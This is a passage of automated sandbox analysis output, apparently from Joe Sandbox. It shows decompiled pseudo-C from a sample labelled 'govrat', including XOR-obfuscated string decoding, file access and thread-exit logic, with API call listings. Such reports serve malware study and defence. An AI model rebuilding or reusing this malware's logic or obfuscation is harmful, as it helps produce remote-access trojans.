    					_t51 = _t51 + 1;
    				} while (_t51 < 7);
    				_t47 =  *((intOrPtr*)(_t60 + 8));
    				 *((intOrPtr*)(_t60 - 0x10)) = _t60 - 0x30;
    				 *((char*)(_t60 - 0x22)) = 1;
    				 *((intOrPtr*)(_t60 - 0xc)) = __edi;
    				_t31 = L0095DD8D(_t60 - 0x10,  *_t47,  *((intOrPtr*)(_t47 + 4)));
    				_pop(_t53);
    				if(_t31 == 0) {
    					L6:
    					_t58 = _t47 + 0x210;
    					_t33 = E00962608(_t47 + 0x210, _t47 + 0x418,  *((intOrPtr*)(_t60 - 8))); // executed
    					if(_t33 < 0) {
    						L8:
    						_t59 = _t47 + 8;
    						L00962890(_t47, _t53, 0x331, _t58, _t59, _t58, _t59);
    						_pop(_t53);
    					} else {
    						_t59 = _t47 + 8;
    						_t41 = PathFileExistsW(_t59); // executed
    						if(_t41 == 0) {
    							goto L8;
    						}
    					}
    				} else {
    					_t59 = _t47 + 8;
    					_push(_t59);
    					_push(_t47 + 0x210);
    					L009626C3(_t47, __edi, _t59);
    					_pop(_t53);
    					while(1) {
    						_t44 =  *0x975974; // 0x1b2d78
    						_push(_t59);
    						if( *_t44() != 0) {
    							goto L9;
    						}
    						Sleep(0x3e8);
    						_t58 = _t58 + 1;
    						if(_t58 < 2) {
    							continue;
    						} else {
    							goto L6;
    						}
    						goto L9;
    					}
    				}
    				L9:
    				_t36 = PathFileExistsW(_t59); // executed
    				if(_t36 != 0) {
    					E0095F98B(_t47, _t58, _t59, _t59);
    					_pop(_t53);
    				}
    				return L0098973B(E0095115B(_t53, 0x331, _t59,  *((intOrPtr*)(_t60 - 8))), 0x331);
    			}

    APIs
    • Sleep.KERNEL32(000003E8), ref: 009611F4
      • Part of subcall function 00962608: ObjectStublessClient10.OLE32(?,00000614,?,0096C338,00000000,00000004,00970718,?), ref: 0096263E
      • Part of subcall function 00962608: ObjectStublessClient10.OLE32(?,?,?,?,00000000), ref: 0096268A
      • Part of subcall function 00962608: ObjectStublessClient10.OLE32(?), ref: 009626AF
    • PathFileExistsW.SHLWAPI(?), ref: 00961226
    • PathFileExistsW.SHLWAPI(?), ref: 0096123E
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 100%
    			E00951734(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void _v32;
    				void* _v36;
    				void* __edi;
    				intOrPtr _t28;
    				signed int _t31;
    				signed int _t44;
    				void* _t50;
    				signed int _t53;
    				char _t55;
    
    				_t44 = 7;
    				_v36 = 0;
    				memset( &_v32, 0, _t44 << 2);
    				if(_a12 != 0) {
    					_t28 = _a8;
    					_t55 = _a4;
    					if(_t28 == 0 || _t55 != 0) {
    						_v24 = 0x42;
    						_v28 = _t55;
    						_v36 = _t55;
    						if(_t28 <= 0x3fffffff) {
    							_v32 = _t28 + _t28;
    						} else {
    							_v32 = 0x7fffffff;
    						}
    						_t31 = E00953B16(_t50,  &_v36, _a12, _a16, _a20); // executed
    						_t53 = _t31;
    						if(_t55 != 0) {
    							_t16 =  &_v32;
    							 *_t16 = _v32 - 1;
    							if( *_t16 < 0) {
    								L0095391C(_t50, _t53, 0,  &_v36);
    							} else {
    								 *_v36 = 0;
    								_v36 = _v36 + 1;
    							}
    							_t22 =  &_v32;
    							 *_t22 = _v32 - 1;
    							if( *_t22 < 0) {
    								L0095391C(_t50, _t53, 0,  &_v36);
    							} else {
    								 *_v36 = 0;
    							}
    							_t31 = _t53;
    						}
    					} else {
    						 *((intOrPtr*)(E009522A2())) = 0x16;
    						_t31 = E0095390C() | 0xffffffff;
    					}
    					return _t31;
    				}
    				 *((intOrPtr*)(E009522A2())) = 0x16;
    				return E0095390C() | 0xffffffff;
    			}

    APIs
    • __woutput_l.LIBCMT ref: 009517BD
      • Part of subcall function 00953B16: __isleadbyte_l.LIBCMT ref: 00953F86
      • Part of subcall function 00953B16: _strlen.LIBCMT ref: 009540A0
      • Part of subcall function 00953B16: __aulldvrm.INT64 ref: 009543DF
      • Part of subcall function 00953B16: _write_string.LIBCMT ref: 00954522
      • Part of subcall function 00953B16: _write_string.LIBCMT ref: 009545F3
      • Part of subcall function 0095391C: __getbuf.LIBCMT ref: 009539BB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 100%
    			E00951A39(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
    				intOrPtr _v24;
    				signed int _v28;
    				void _v32;
    				signed int _v36;
    				void* __edi;
    				signed int _t25;
    				signed int _t34;
    				void _t36;
    				void* _t39;
    				signed int _t42;
    				signed int _t44;
    
    				_v36 = _v36 & 0x00000000;
    				_t34 = 7;
    				if(_a12 != memset( &_v32, 0, _t34 << 2)) {
    					_t36 = _a8;
    					_t44 = _a4;
    					if(_t36 == 0 || _t44 != 0) {
    						_v32 = 0x7fffffff;
    						if(_t36 <= 0x7fffffff) {
    							_v32 = _t36;
    						}
    						_v24 = 0x42;
    						_v28 = _t44;
    						_v36 = _t44;
    						_t25 = E009554D3(_t39,  &_v36, _a12, _a16, _a20); // executed
    						_t42 = _t25;
    						if(_t44 != 0) {
    							_t17 =  &_v32;
    							 *_t17 = _v32 - 1;
    							if( *_t17 < 0) {
    								L0095391C(_t39, _t42, 0,  &_v36);
    							} else {
    								 *_v36 = 0;
    							}
    							_t25 = _t42;
    						}
    					} else {
    						 *((intOrPtr*)(E009522A2())) = 0x16;
    						_t25 = E0095390C() | 0xffffffff;
    					}
    					return _t25;
    				}
    				 *((intOrPtr*)(E009522A2())) = 0x16;
    				return E0095390C() | 0xffffffff;
    			}

    APIs
    • __output_l.LIBCMT ref: 00951AB7
      • Part of subcall function 009554D3: __isleadbyte_l.LIBCMT ref: 00955866
      • Part of subcall function 009554D3: _strlen.LIBCMT ref: 00955A66
      • Part of subcall function 009554D3: __aulldvrm.INT64 ref: 00955DEA
      • Part of subcall function 009554D3: _write_string.LIBCMT ref: 00955F3A
      • Part of subcall function 009554D3: _write_string.LIBCMT ref: 00955FE1
      • Part of subcall function 009554D3: _write_string.LIBCMT ref: 0095600F
      • Part of subcall function 0095391C: __getbuf.LIBCMT ref: 009539BB
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 100%
    			E00963675(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				void* _t7;
    				short _t10;
    				void* _t11;
    				signed int _t12;
    				void* _t16;
    
    				_t11 = __edi;
    				_t2 = __eax - 1; // 0x1ff
    				_t12 = _t2;
    				_t10 = 0;
    				_t7 = E00951805(__edi, _t12, _a4, _a8); // executed
    				if(_t7 < 0) {
    					L4:
    					_t10 = 0x8007007a;
    					goto L5;
    				} else {
    					_t16 = _t7 - _t12;
    					if(_t16 > 0) {
    						goto L4;
    					} else {
    						if(_t16 == 0) {
    							L5:
    							 *((short*)(_t11 + _t12 * 2)) = 0;
    						}
    					}
    				}
    				return _t10;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 59%
    			E0096062C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				void* _t24;
    				void* _t25;
    				short _t28;
    				void* _t51;
    				void* _t53;
    				void* _t59;
    				void* _t66;
    
    				_t66 = __eflags;
    				_t53 = __edx;
    				CloseHandle( *(_t59 - 0x44));
    				_push(0x2710);
    				E0095D184();
    				_push(_t59 - 0x458);
    				_push(_t59 - 0x250);
    				L00987C0F(_t59 - 0x250);
    				_t24 = L00961F7B(__ebx, _t53, __edi, __esi, _t66, _t59 - 0x458);
    				_t51 = _t59;
    				_t67 = _t24;
    				if(_t24 == 0) {
    					_t25 = E0095115B(_t51, _t53, __esi, __edi);
    					goto L11;
    				} else {
    					__eflags =  *((intOrPtr*)(__ebp + 8)) - __ebx;
    					if( *((intOrPtr*)(__ebp + 8)) == __ebx) {
    						L11:
    						return _t25;
    					} else {
    						_push(__ebx);
    						__eflags =  *0x9759a4 - __ebx; // 0x0
    						if(__eflags == 0) {
    							ExitProcess(); // executed
    						}
    						__eax =  *0x974f14; // 0x0
    						 *__eax = 1;
    						 *0x96c0c0();
    						_t28 = E009602B6(0x974f18, _t67);
    						_t68 = _t28;
    						if(_t28 == 0) {
    							 *((short*)(_t59 - 0x250)) = _t28;
    							L00958BA0(_t59 - 0x24e, __ebx, 0x206);
    							L009601FD(_t68, _t59 - 0x250); // executed
    							_push(_t59 - 0x250);
    							return L0098B346(_t59 - 0x250, _t53, __edi);
    						}
    						_push(__esi);
    						_push(__edi);
    						_push(_t59 - 0x868);
    						L00962167(_t51, _t53, __edi, __esi);
    						 *((short*)(_t59 - 0x458)) = 0;
    						L00958BA0(_t59 - 0x456, __ebx, 0x206);
    						__eflags = 0;
    						 *((short*)(_t59 - 0x250)) = 0;
    						L00958BA0(_t59 - 0x24e, __ebx, 0x206);
    						_push(_t59 - 0x250);
    						_push(_t59 - 0x458);
    						_push(_t59 - 0x868);
    						return L00A14979(L0095FB70(__ebx, __edi, 0x206));
    					}
    				}
    				goto L12;
    			}

    0x0096062c
    0x0096062c
    0x0096062f
    0x00960635
    0x0096063a
    0x00960646
    0x0096064d
    0x0096064f
    0x0096065b
    0x00960660
    0x00960661
    0x00960663
    0x00960688
    0x00000000
    0x00960665
    0x00960665
    0x00960668
    0x0096068e
    0x00960692
    0x0096066a
    0x0096066a
    0x0096066b
    0x00960671
    0x00960507
    0x00960507
    0x00960677
    0x0096067c
    0x009604b4
    0x009604bf
    0x009604c4
    0x009604c6
    0x009604cd
    0x009604dc
    0x009604e8
    0x009604f6
    0x00000000
    0x009604f7
    0x0096050d
    0x0096050e
    0x00960515
    0x00960516
    0x00960523
    0x00960532
    0x00960537
    0x0096053a
    0x00960549
    0x00960557
    0x0096055e
    0x00960565
    0x00960573
    0x00960573
    0x00960668
    0x00000000

    APIs
    • ExitProcess.KERNEL32(?,?,?,?), ref: 00960507
    • CloseHandle.KERNEL32(?), ref: 0096062F
      • Part of subcall function 0095D184: CloseHandle.KERNEL32(00000000), ref: 0095D1A0
      • Part of subcall function 00961F7B: SendMessageW.USER32(00000402,00000000,00000000,00000000), ref: 0096212D
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 57%
    			E00961AB7(signed int __ebx, void* __edx, void* __edi, void* __ebp, char _a2, short _a4, short _a6, short _a8, short _a10, short _a12, short _a14, short _a16, signed int _a18, char _a104, char _a120) {
    				void* _t24;
    				void* _t27;
    				intOrPtr* _t33;
    				signed int _t35;
    				void* _t46;
    				intOrPtr* _t47;
    				void* _t49;
    				void* _t51;
    
    				_t46 = __edi;
    				_t45 = __edx;
    				_t35 = __ebx;
    				_pop(_t47);
    				L009E14C3(_t24, __edx, _t47);
    				while(1) {
    					_t27 =  *_t47( &_a120, _t35, _t35, _t35); // executed
    					if(_t27 == _t35) {
    						break;
    					}
    					if(_t27 == 0xffffffff) {
    						continue;
    					}
    					_push( &_a104);
    					return L009B410C( &_a104, _t45);
    				}
    				_t51 =  *0x9759a4 - _t35; // 0x0
    				if(_t51 != 0) {
    					_t33 =  *0x974f14; // 0x0
    					_push(_t35);
    					 *_t33 = 1;
    					RtlExitUserThread();
    				}
    				_a16 = 0x571;
    				_a14 = 0x540;
    				_a12 = 0x52b;
    				_a10 = 0x522;
    				_a8 = 0x534;
    				_a6 = 0x536;
    				_a4 = 0x529;
    				_a2 = 0x535;
    				_a18 = _t35;
    				do {
    					 *(_t49 + 0xe + _t35 * 2) =  *(_t49 + 0xe + _t35 * 2) ^ 0x00000571;
    					_t35 = _t35 + 1;
    				} while (_t35 < 8);
    				_push(_a8);
    				_push( &_a2);
    				_a18 = 1;
    				return L009D8084( &_a2, 0x571, _t46);
    			}

    0x00961ab7
    0x00961ab7
    0x00961ab7
    0x00961ab7
    0x00961ab8
    0x00961ada
    0x00961ae5
    0x00961ae9
    0x00000000
    0x00000000
    0x00961ac2
    0x00000000
    0x00000000
    0x00961ac8
    0x00000000
    0x00961ac9
    0x00961aeb
    0x00961af1
    0x00961af3
    0x00961af8
    0x00961af9
    0x00961aff
    0x00961aff
    0x00961b0c
    0x00961b14
    0x00961b1c
    0x00961b24
    0x00961b2c
    0x00961b34
    0x00961b3c
    0x00961b44
    0x00961b49
    0x00961b4d
    0x00961b4f
    0x00961b54
    0x00961b55
    0x00961b5a
    0x00961b61
    0x00961b62
    0x00000000

    APIs
    • KiUserCallbackDispatcher.NTDLL(?), ref: 00961AE5
    • RtlExitUserThread.NTDLL(?,?,?,?,?,?), ref: 00961AFF
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • SendMessageW.USER32(0000004A,00000000,?), ref: 0095FA00
    • Sleep.KERNELBASE(00000000), ref: 0095FA03
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • RtlEncodePointer.NTDLL(00000004,?,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 0095879F
    • RtlEncodePointer.NTDLL(-00000004,?,?,?,?,00958808,?,00970BC0,0000000C,00958834,?,?,00952402,0095802D), ref: 009587A7
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 72%
    			E00953268(void* __ebx) {
    				void* _t3;
    				void* _t6;
    
    				_t6 = TlsGetValue( *0x972908);
    				_t7 = _t6;
    				if(_t6 == 0) {
    					_push( *0x9738d8);
    					_push(__ebx); // executed
    					_t3 = L009775C6(_t1, __ebx, _t7); // executed
    					_t6 = _t3;
    					TlsSetValue( *0x972908, _t6);
    				}
    				return _t6;
    			}

    0x00953277
    0x00953279
    0x0095327b
    0x0095327d
    0x00953283
    0x00953284
    0x00953289
    0x00953292
    0x00953292
    0x0095329b

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 96%
    			E00960BBC(intOrPtr* _a4) {
    				void* _v12;
    				WCHAR* _v24;
    				char _v28;
    				short _v30;
    				short _v32;
    				short _v34;
    				short _v36;
    				char _v40;
    				char _v44;
    				short _v46;
    				short _v48;
    				short _v50;
    				short _v52;
    				short _v54;
    				char _v56;
    				char _v60;
    				short _v62;
    				short _v64;
    				short _v66;
    				intOrPtr _v70;
    				char _v72;
    				char _v76;
    				short _v78;
    				intOrPtr _v82;
    				short _v84;
    				short _v86;
    				short _v88;
    				short _v90;
    				char _v92;
    				char _v94;
    				short _v96;
    				short _v98;
    				short _v100;
    				short _v102;
    				short _v104;
    				short _v106;
    				short _v108;
    				short _v110;
    				char _v112;
    				char _v114;
    				short _v116;
    				short _v118;
    				short _v120;
    				short _v122;
    				short _v124;
    				short _v126;
    				short _v128;
    				intOrPtr _v132;
    				short _v134;
    				char _v136;
    				char _v138;
    				short _v140;
    				short _v142;
    				short _v144;
    				short _v146;
    				short _v148;
    				short _v150;
    				short _v152;
    				intOrPtr _v156;
    				short _v158;
    				short _v160;
    				short _v162;
    				char _v164;
    				struct _SECURITY_ATTRIBUTES* _v172;
    				char* _v176;
    				char* _v180;
    				char* _v184;
    				char* _v188;
    				char* _v192;
    				char* _v196;
    				char _v200;
    				void* __esi;
    				signed int _t153;
    				signed int _t155;
    				signed int _t157;
    				signed int _t159;
    				signed int _t161;
    				signed int _t163;
    				signed int _t165;
    				void* _t170;
    				void* _t172;
    				void* _t241;
    				void* _t243;
    				void* _t245;
    
    				_t243 = _t245;
    				_v24 = _a4 + 8;
    				_v96 = 0x497;
    				_v98 = 0x497;
    				_v100 = 0x4e5;
    				_v102 = 0x4e2;
    				_v104 = 0x4f4;
    				_v106 = 0x497;
    				_v108 = 0x4c4;
    				_v110 = 0x4ba;
    				_v112 = 0x4d1;
    				_v62 = 0x498;
    				_v72 = 0x4c8;
    				_v30 = 0x499;
    				_v32 = 0x4b9;
    				_v64 = 0x4f9;
    				_v34 = 0x4cd;
    				_v66 = 0x4fc;
    				_v46 = 0x49a;
    				_v48 = 0x4fb;
    				_v50 = 0x4e8;
    				_v36 = 0x4dc;
    				_v52 = 0x4f3;
    				_v54 = 0x4ec;
    				_v56 = 0x4db;
    				_v140 = 0x49b;
    				_v142 = 0x4bb;
    				_v144 = 0x4e9;
    				_v146 = 0x4fe;
    				_v148 = 0x4ff;
    				_v150 = 0x4f5;
    				_v94 = 0;
    				_v70 = 0x4f604f9;
    				_v60 = 0;
    				_v40 = 0x4ca04dc;
    				_v28 = 0;
    				_v44 = 0;
    				_v152 = 0x4fe;
    				_v156 = 0x4fd04fe;
    				_v158 = 0x4ff;
    				_v160 = 0x4ef;
    				_v84 = 0x4f3;
    				_v162 = 0x4f2;
    				_v86 = 0x4e8;
    				_v164 = 0x4d9;
    				_v78 = 0x49c;
    				_v90 = 0x4f3;
    				_v88 = 0x4ee;
    				_v92 = 0x4d2;
    				_v116 = 0x49d;
    				_v118 = 0x4bd;
    				_v120 = 0x4e4;
    				_v122 = 0x4f6;
    				_v126 = 0x4ef;
    				_v134 = 0x4fc;
    				_v136 = 0x4d6;
    				_v138 = 0;
    				_v82 = 0x4bc04f2;
    				_v76 = 0;
    				_v124 = 0x4ee;
    				_v128 = 0x4f8;
    				_v132 = 0x4ed04ee;
    				_v114 = 0;
    				_t153 = 0;
    				do {
    					 *(_t243 + _t153 * 2 - 0x6c) =  *(_t243 + _t153 * 2 - 0x6c) ^ 0x00000497;
    					_t153 = _t153 + 1;
    				} while (_t153 < 9);
    				_v200 =  &_v112;
    				_v94 = 1;
    				_t155 = 0;
    				do {
    					 *(_t243 + _t155 * 2 - 0x44) =  *(_t243 + _t155 * 2 - 0x44) ^ 0x00000498;
    					_t155 = _t155 + 1;
    				} while (_t155 < 6);
    				_v196 =  &_v72;
    				_v60 = 1;
    				_t157 = 0;
    				do {
    					 *(_t243 + _t157 * 2 - 0x24) =  *(_t243 + _t157 * 2 - 0x24) ^ 0x00000499;
    					_t157 = _t157 + 1;
    				} while (_t157 < 6);
    				_v192 =  &_v40;
    				_v28 = 1;
    				_t159 = 0;
    				do {
    					 *(_t243 + _t159 * 2 - 0x34) =  *(_t243 + _t159 * 2 - 0x34) ^ 0x0000049a;
    					_t159 = _t159 + 1;
    				} while (_t159 < 6);
    				_v188 =  &_v56;
    				_v44 = 1;
    				_t161 = 0;
    				do {
    					 *(_t243 + _t161 * 2 - 0xa0) =  *(_t243 + _t161 * 2 - 0xa0) ^ 0x0000049b;
    					_t161 = _t161 + 1;
    				} while (_t161 < 0xd);
    				_v184 =  &_v164;
    				_v138 = 1;
    				_t163 = 0;
    				do {
    					 *(_t243 + _t163 * 2 - 0x58) =  *(_t243 + _t163 * 2 - 0x58) ^ 0x49c;
    					_t163 = _t163 + 1;
    				} while (_t163 < 8);
    				_v180 =  &_v92;
    				_v76 = 1;
    				_t165 = 0;
    				do {
    					 *(_t243 + _t165 * 2 - 0x84) =  *(_t243 + _t165 * 2 - 0x84) ^ 0x49d;
    					_t165 = _t165 + 1;
    				} while (_t165 < 0xb);
    				_t211 = _a4;
    				_v176 =  &_v136;
    				_v114 = 1;
    				_v172 = 0;
    				if(L0095DD8D( &_v200,  *_a4,  *((intOrPtr*)(_t211 + 4))) != 0) {
    					L17:
    					_t170 = 0x2b;
    					return _t170;
    				} else {
    					_pop(_t241);
    					L0097951F(_t169, _t241);
    					_t172 = CreateFileW(_v24, 0x80000000, 1, 0, 3, 0x80, 0); // executed
    					_v12 = _t172;
    					if(_t172 == 0xffffffff) {
    						goto L17;
    					} else {
    						_push(0);
    						_push(_t172);
    						return L009EB134(_t172);
    					}
    				}
    			}

    0x00960bbd
    0x00960bce
    0x00960bd6
    0x00960bdf
    0x00960be8
    0x00960bef
    0x00960bf8
    0x00960bfe
    0x00960c07
    0x00960c0e
    0x00960c17
    0x00960c1e
    0x00960c2c
    0x00960c35
    0x00960c3c
    0x00960c40
    0x00960c4c
    0x00960c53
    0x00960c5e
    0x00960c65
    0x00960c6e
    0x00960c72
    0x00960c7b
    0x00960c82
    0x00960c89
    0x00960c90
    0x00960c9a
    0x00960ca4
    0x00960cb2
    0x00960cbc
    0x00960cc6
    0x00960ccf
    0x00960cd2
    0x00960cd9
    0x00960cdc
    0x00960ce3
    0x00960ce6
    0x00960ce9
    0x00960cf0
    0x00960cfa
    0x00960d06
    0x00960d11
    0x00960d15
    0x00960d22
    0x00960d29
    0x00960d35
    0x00960d3b
    0x00960d42
    0x00960d46
    0x00960d4f
    0x00960d56
    0x00960d5d
    0x00960d64
    0x00960d6a
    0x00960d74
    0x00960d7e
    0x00960d85
    0x00960d8b
    0x00960d92
    0x00960d95
    0x00960d99
    0x00960d9d
    0x00960da4
    0x00960da7
    0x00960da9
    0x00960dae
    0x00960db3
    0x00960db4
    0x00960dbc
    0x00960dc2
    0x00960dc6
    0x00960dc8
    0x00960dcd
    0x00960dd2
    0x00960dd3
    0x00960ddb
    0x00960de1
    0x00960de5
    0x00960de7
    0x00960dec
    0x00960df1
    0x00960df2
    0x00960dfa
    0x00960e00
    0x00960e04
    0x00960e06
    0x00960e0b
    0x00960e10
    0x00960e11
    0x00960e19
    0x00960e1f
    0x00960e23
    0x00960e25
    0x00960e2a
    0x00960e32
    0x00960e33
    0x00960e3e
    0x00960e44
    0x00960e4b
    0x00960e4d
    0x00960e4f
    0x00960e54
    0x00960e55
    0x00960e5d
    0x00960e63
    0x00960e67
    0x00960e69
    0x00960e6b
    0x00960e73
    0x00960e74
    0x00960e79
    0x00960e85
    0x00960e94
    0x00960e98
    0x00960ea7
    0x00961064
    0x00961066
    0x0096106b
    0x00960ead
    0x00960ead
    0x00960eae
    0x00960ec7
    0x00960ec9
    0x00960ecf
    0x00000000
    0x00960ed5
    0x00960ed5
    0x00960ed6
    0x00960edc
    0x00960edc
    0x00960ecf

    APIs
    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00960EC7
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 67%
    			E0096334D() {
    				void* _t140;
    				signed int _t143;
    				void* _t209;
    
    				 *((short*)(_t209 - 0x3e)) = 0x12d;
    				 *((short*)(_t209 - 0x40)) = 0x10a;
    				 *((short*)(_t209 - 0x42)) = 0x14a;
    				 *((short*)(_t209 - 0x44)) = 0x143;
    				 *((short*)(_t209 - 0x46)) = 0x144;
    				 *((short*)(_t209 - 0x48)) = 0x143;
    				 *((short*)(_t209 - 0x4a)) = 0x143;
    				 *((short*)(_t209 - 0x4c)) = 0x158;
    				 *((short*)(_t209 - 0x4e)) = 0x17f;
    				 *((short*)(_t209 - 0x50)) = 0x10a;
    				 *((short*)(_t209 - 0x52)) = 0x10d;
    				 *((short*)(_t209 - 0x54)) = 0x168;
    				 *((short*)(_t209 - 0x56)) = 0x166;
    				 *((short*)(_t209 - 0x58)) = 0x164;
    				 *((short*)(_t209 - 0x5a)) = 0x161;
    				 *((short*)(_t209 - 0x5c)) = 0x10d;
    				 *((short*)(_t209 - 0x5e)) = 0x148;
    				 *((short*)(_t209 - 0x60)) = 0x159;
    				 *((short*)(_t209 - 0x62)) = 0x14c;
    				 *((short*)(_t209 - 0x64)) = 0x159;
    				 *((short*)(_t209 - 0x66)) = 0x17e;
    				 *((short*)(_t209 - 0x68)) = 0x10d;
    				 *((short*)(_t209 - 0x6a)) = 0x169;
    				 *((short*)(_t209 - 0x6c)) = 0x163;
    				 *((short*)(_t209 - 0x6e)) = 0x16c;
    				 *((short*)(_t209 - 0x70)) = 0x10d;
    				 *((short*)(_t209 - 0x72)) = 0x10a;
    				 *((short*)(_t209 - 0x74)) = 0x149;
    				 *((short*)(_t209 - 0x76)) = 0x143;
    				 *((short*)(_t209 - 0x78)) = 0x148;
    				 *((short*)(_t209 - 0x7a)) = 0x14b;
    				 *((short*)(_t209 - 0x7c)) = 0x148;
    				 *((short*)(_t209 - 0x7e)) = 0x169;
    				 *((short*)(_t209 - 0x80)) = 0x143;
    				 *((short*)(_t209 - 0x88)) = 0x10d;
    				 *((short*)(_t209 - 0x8a)) = 0x110;
    				 *((short*)(_t209 - 0x8c)) = 0x10d;
    				 *((short*)(_t209 - 0x8e)) = 0x148;
    				 *((short*)(_t209 - 0x90)) = 0x140;
    				 *((short*)(_t209 - 0x92)) = 0x14c;
    				 *((short*)(_t209 - 0x94)) = 0x163;
    				 *((short*)(_t209 - 0x96)) = 0x10d;
    				 *((short*)(_t209 - 0x82)) = 0x144;
    				 *((short*)(_t209 - 0x98)) = 0x148;
